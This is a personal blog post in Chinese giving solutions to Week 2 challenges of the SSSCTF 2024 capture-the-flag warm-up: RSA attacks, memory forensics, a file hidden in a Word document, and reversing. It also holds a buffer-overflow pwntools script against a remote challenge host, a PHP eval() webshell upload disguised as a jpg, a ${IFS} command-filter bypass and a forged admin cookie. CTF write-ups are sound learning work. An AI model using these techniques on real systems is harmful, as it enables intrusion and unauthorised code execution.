<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="用户名：songhahaha">
<meta property="og:type" content="article">
<meta property="og:title" content="SSSCTF 2024热身赛个人题解">
<meta property="og:url" content="http://example.com/2024/10/22/SSSCTF%202024%E7%83%AD%E8%BA%AB%E8%B5%9B%E4%B8%AA%E4%BA%BA%E9%A2%98%E8%A7%A3[Week%202]/index.html">
<meta property="og:site_name" content="songhahaha的个人博客">
<meta property="og:description" content="用户名：songhahaha">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/images%5C2024-10-04-15-46-45-image.png">
<meta property="og:image" content="http://example.com/images%5C2024-10-04-15-51-51-image.png">
<meta property="og:image" content="http://example.com/images%5C2024-10-04-16-37-39-image.png">
<meta property="og:image" content="http://example.com/images%5C2024-10-04-16-38-06-image.png">
<meta property="og:image" content="http://example.com/images%5C2024-10-04-17-00-48-image.png">
<meta property="article:published_time" content="2024-10-22T01:39:37.557Z">
<meta property="article:modified_time" content="2024-10-22T02:12:52.679Z">
<meta property="article:author" content="songhahaha">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images%5C2024-10-04-15-46-45-image.png">

<link rel="canonical" href="http://example.com/2024/10/22/SSSCTF%202024%E7%83%AD%E8%BA%AB%E8%B5%9B%E4%B8%AA%E4%BA%BA%E9%A2%98%E8%A7%A3[Week%202]/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>SSSCTF 2024热身赛个人题解 | songhahaha的个人博客</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">songhahaha的个人博客</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">songhahaha</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2024/10/22/SSSCTF%202024%E7%83%AD%E8%BA%AB%E8%B5%9B%E4%B8%AA%E4%BA%BA%E9%A2%98%E8%A7%A3[Week%202]/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="songhahaha">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="songhahaha的个人博客">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          SSSCTF 2024热身赛个人题解
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2024-10-22 09:39:37 / 修改时间：10:12:52" itemprop="dateCreated datePublished" datetime="2024-10-22T09:39:37+08:00">2024-10-22</time>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>用户名：songhahaha</p>
<span id="more"></span>

<h2 id="RSA-e-Week-2"><a href="#RSA-e-Week-2" class="headerlink" title="RSA-e [Week 2]"></a>RSA-e [Week 2]</h2><p>本质是在求m。阅读程序内容，根据题目，发现e是3。不断尝试i的值直到可以正好开出三次方根即可</p>
<p>附上代码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">import gmpy2</span><br><span class="line">from Crypto.Util.number import long_to_bytes</span><br><span class="line"></span><br><span class="line"># 提供的 n 和 c 值</span><br><span class="line"></span><br><span class="line">n=105650631728257008108561874488327722371862024925550050792655632625433442161687060029992338535946959242791119257975281359584740185113806870588427317063930511131901248212511510595009331328662900420925168030372340748125244590298364661170452279004783687325945511892811021258863484182452805913241314799472906271077</span><br><span class="line">c=94789662407405287741529383938944459229650389129247155603625740437529345338703658014600196039183230809348643985086405616416523706159728249305295402602096784947532755317178511457237518904219549495106805326262022916675310436660377884488471920026769163829590664325391891293820703273877344245222510445255853818046</span><br><span class="line"></span><br><span class="line"># 计算 c 的立方根（因为 e=3）</span><br><span class="line">for i in range(1,100000000):</span><br><span class="line">    m = gmpy2.iroot(c+i*n, 3)</span><br><span class="line">    if m[1] == True:</span><br><span class="line">        print(long_to_bytes(m[0]))</span><br><span class="line"># 将整数转换回字节</span><br></pre></td></tr></table></figure>

<h2 id="RSA-E-Week-2"><a href="#RSA-E-Week-2" class="headerlink" title="RSA-E [Week 2]"></a>RSA-E [Week 2]</h2><p>本人上网搜索时发现了一个很好用的库：RSAwienerHacker。直接调用即可。附上代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">from RSAwienerHacker import hack_RSA</span><br><span class="line">from Crypto.Util.number import bytes_to_long, long_to_bytes, getPrime</span><br><span class="line">c=58234336898424302636201765418220283796578738146469984082614847446689929837024979468949972593584870009577517433999879102635401270762409497015907657180524234549729236002613124712748565060114257752451815008897745549918126326708505540918881108833283092648334432692069205706584710126183439208346105070804741082596</span><br><span class="line">n=112259298411628664888957008925780305030360921696154406031271115423378281391499919267496971072040754848773709001400891654892517047446984168857373093858495214778957382409119831064172799526988802131784346813280114102778835460355638262072340481178766965143797158391441885629537738135907550346907094479951328183763</span><br><span class="line">e=111115887656101244687796955811335986989053451743606537019599568320494582306256529376097780540111822489880795690677341135415255153149490860445985078789250529198988536868926150234540324423925719492374896015774270009544217908348283952580840864872992188231299103939207039056208917892248190115172304263200003792501</span><br><span class="line"></span><br><span class="line">d=hack_RSA(e,n)</span><br><span class="line">m=pow(c ,d ,n)</span><br><span class="line">print(long_to_bytes(m))</span><br></pre></td></tr></table></figure>

<h2 id="rSa-Week-2"><a href="#rSa-Week-2" class="headerlink" title="rSa [Week 2]"></a>rSa [Week 2]</h2><p>先使用yafu爆破n，得到p，q的值</p>
<p>题目有坑，经过提示之后才想明白这个解密后的东西可能跟原数差n的整数倍</p>
<p>通过脚本尝试，获取出最后的答案</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">from Crypto.Util.number import long_to_bytes</span><br><span class="line"></span><br><span class="line">m1 = 5537273666024716745084247432484648918429756130955132400853234300195670541127169</span><br><span class="line">n = 9135202130451869701301124652174939469057750919174162030524834229036208715671141</span><br><span class="line">for i in range(1,10000000000):</span><br><span class="line">    m = m1+i*n</span><br><span class="line">    uuid_bytes = long_to_bytes(m)</span><br><span class="line">    try:</span><br><span class="line">        uuid_str = uuid_bytes.decode()</span><br><span class="line">        print(uuid_str)</span><br><span class="line">        print(i)</span><br><span class="line">    except:</span><br><span class="line">        pass</span><br></pre></td></tr></table></figure>

<h2 id="Easy-Forensics-Week-2"><a href="#Easy-Forensics-Week-2" class="headerlink" title="Easy Forensics [Week 2]"></a>Easy Forensics [Week 2]</h2><p>内存取证问题。下载zip。使用volatility打开。先使用imageinfo查看以下基本信息。</p>
<p><img src="/images%5C2024-10-04-15-46-45-image.png">再输入</p>
<p><code> ./volatility -f memory.raw --profile=Win7SP1x64 filescan | findstr &quot;flag&quot;</code></p>
<p><img src="/images%5C2024-10-04-15-51-51-image.png"></p>
<p>确认文件在<code>0x000000007fdc2150</code>里，只需提取文件即可<code>./volatility -f memory.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000007fdc2150 -D ./ -u</code>，随后得到ZmxhZ3tXaGF0X2lzX0YwcmVuc2ljc30&#x3D;，解密即可得到flag。</p>
<h2 id="梦入七夕坂-Week-2"><a href="#梦入七夕坂-Week-2" class="headerlink" title="梦入七夕坂 [Week 2]"></a>梦入七夕坂 [Week 2]</h2><p>下载word文档。后辍改为zip，解压。观察发现theme5.xml这个文件体积过大，打开，发现<secret>藏着东西，复制这段。反复摸索尝试后发现这是个zip文件经过base64加密后的。找个网站转换之后下载zip文件，拿到Secret，发现是一个png文件，改后辍后得到flag</p>
<h2 id="东方绀珠传-Week-2"><a href="#东方绀珠传-Week-2" class="headerlink" title="东方绀珠传 [Week 2]"></a>东方绀珠传 [Week 2]</h2><p>先打开玩了会游戏，发现有点困难。于是百度贴吧里找到了这个游戏的存档，使用了存档直接通关看结局了（最简单的一集）。附上网址<a target="_blank" rel="noopener" href="https://tieba.baidu.com/p/4005036262?pid=74714424682&cid=0#74714424682">能求个存档么，想拿来做素材【东方绀珠传吧】_百度贴吧 (baidu.com)</a></p>
<h2 id="pwntools-Week-2"><a href="#pwntools-Week-2" class="headerlink" title="pwntools [Week 2]"></a>pwntools [Week 2]</h2><p>附上脚本（好像是这个，不在学校没法测试）：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">def get_content():</span><br><span class="line">    print(p.recvline())</span><br><span class="line">    print(p.recvline())</span><br><span class="line">    print(p.recvline())</span><br><span class="line">    print(p.recvline())</span><br><span class="line">    payload = b&quot;A&quot; * 32 + b&quot;\x60\x66\x40\x00\x00\x00\x00\x00&quot;</span><br><span class="line">    p.sendline(payload)</span><br><span class="line">    print(p.recvline())</span><br><span class="line">p = remote(&quot;202.118.70.22&quot;, 20177)</span><br><span class="line">get_content()</span><br></pre></td></tr></table></figure>

<h2 id="What-is-ida-Week-2"><a href="#What-is-ida-Week-2" class="headerlink" title="What_is_ida [Week 2]"></a>What_is_ida [Week 2]</h2><p>分成好几个部分，前三部分进入ida找找就找到了。最后一个动态调试，更改rip的值，使其执行hard_enc()函数。结果为abcde}。综合四部分，结果为flag{9f8a6b3d1e4c2f7g5h9i0jklmnopqrstuvwxzabcde}</p>
<h2 id="沙勒启动-Week-2"><a href="#沙勒启动-Week-2" class="headerlink" title="沙勒启动 [Week 2]"></a>沙勒启动 [Week 2]</h2><p>与其盯着一堆复杂的东西逆向分析，我不如真的点击999次（没一会就点完了）</p>
<h2 id="这次我真没藏flag-Week-2"><a href="#这次我真没藏flag-Week-2" class="headerlink" title="这次我真没藏flag [Week 2]"></a>这次我真没藏flag [Week 2]</h2><p>目标是上传一个木马病毒进行执行，本人使用postman进行操作。主要就是更改header为伪装为jpg？个人感觉很玄学，莫名其妙php就上传成功了，好像有时候行有时候不行？（本人不在学校没法复现截图了）。上传一个带eval()的php，然后执行命令就可以拿到flag</p>
<h2 id="深境螺旋挑战-Week-2"><a href="#深境螺旋挑战-Week-2" class="headerlink" title="深境螺旋挑战 [Week 2]"></a>深境螺旋挑战 [Week 2]</h2><p>多关卡考验。第一关<img src="/images%5C2024-10-04-16-37-39-image.png"></p>
<p>第二关：<img src="/images%5C2024-10-04-16-38-06-image.png"></p>
<p>第三关传一个sssctf值为SSSCTF就行。</p>
<p>第四关content内容为data:&#x2F;&#x2F;text&#x2F;plain;base64,MjAyNFNTU0NURg&#x3D;&#x3D;</p>
<p>第五关试了半天，平台禁止了好多字符输入。最后本人查阅资料发现好像空格使用${IFS}并且在more中间加上\就可以完美避开审查</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mo\re$&#123;IFS&#125;/fla\g</span><br></pre></td></tr></table></figure>

<h2 id="flag又被藏起来了！-Week-2"><a href="#flag又被藏起来了！-Week-2" class="headerlink" title="flag又被藏起来了！ [Week 2]"></a>flag又被藏起来了！ [Week 2]</h2><p>（本人不在学校，只能大致复述过程）首先注册账号，随后抓包发现不是管理员。改cookie为管理员之后。进入&#x2F;admin目录。随后继续进行即可获取flag（我忘了后来什么样了）。好像有一个喂橘子环节。本人使用python脚本爆破。</p>
<p><img src="/images%5C2024-10-04-17-00-48-image.png"></p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#RSA-e-Week-2"><span class="nav-number">1.</span> <span class="nav-text">RSA-e [Week 2]</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#RSA-E-Week-2"><span class="nav-number">2.</span> <span class="nav-text">RSA-E [Week 2]</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#rSa-Week-2"><span class="nav-number">3.</span> <span class="nav-text">rSa [Week 2]</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Easy-Forensics-Week-2"><span class="nav-number">4.</span> <span class="nav-text">Easy Forensics [Week 2]</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%A2%A6%E5%85%A5%E4%B8%83%E5%A4%95%E5%9D%82-Week-2"><span class="nav-number">5.</span> <span class="nav-text">梦入七夕坂 [Week 2]</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%9C%E6%96%B9%E7%BB%80%E7%8F%A0%E4%BC%A0-Week-2"><span class="nav-number">6.</span> <span class="nav-text">东方绀珠传 [Week 2]</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#pwntools-Week-2"><span class="nav-number">7.</span> <span class="nav-text">pwntools [Week 2]</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#What-is-ida-Week-2"><span class="nav-number">8.</span> <span class="nav-text">What_is_ida [Week 2]</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%B2%99%E5%8B%92%E5%90%AF%E5%8A%A8-Week-2"><span class="nav-number">9.</span> <span class="nav-text">沙勒启动 [Week 2]</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%BF%99%E6%AC%A1%E6%88%91%E7%9C%9F%E6%B2%A1%E8%97%8Fflag-Week-2"><span class="nav-number">10.</span> <span class="nav-text">这次我真没藏flag [Week 2]</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%B7%B1%E5%A2%83%E8%9E%BA%E6%97%8B%E6%8C%91%E6%88%98-Week-2"><span class="nav-number">11.</span> <span class="nav-text">深境螺旋挑战 [Week 2]</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#flag%E5%8F%88%E8%A2%AB%E8%97%8F%E8%B5%B7%E6%9D%A5%E4%BA%86%EF%BC%81-Week-2"><span class="nav-number">12.</span> <span class="nav-text">flag又被藏起来了！ [Week 2]</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">songhahaha</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">1</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">songhahaha</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
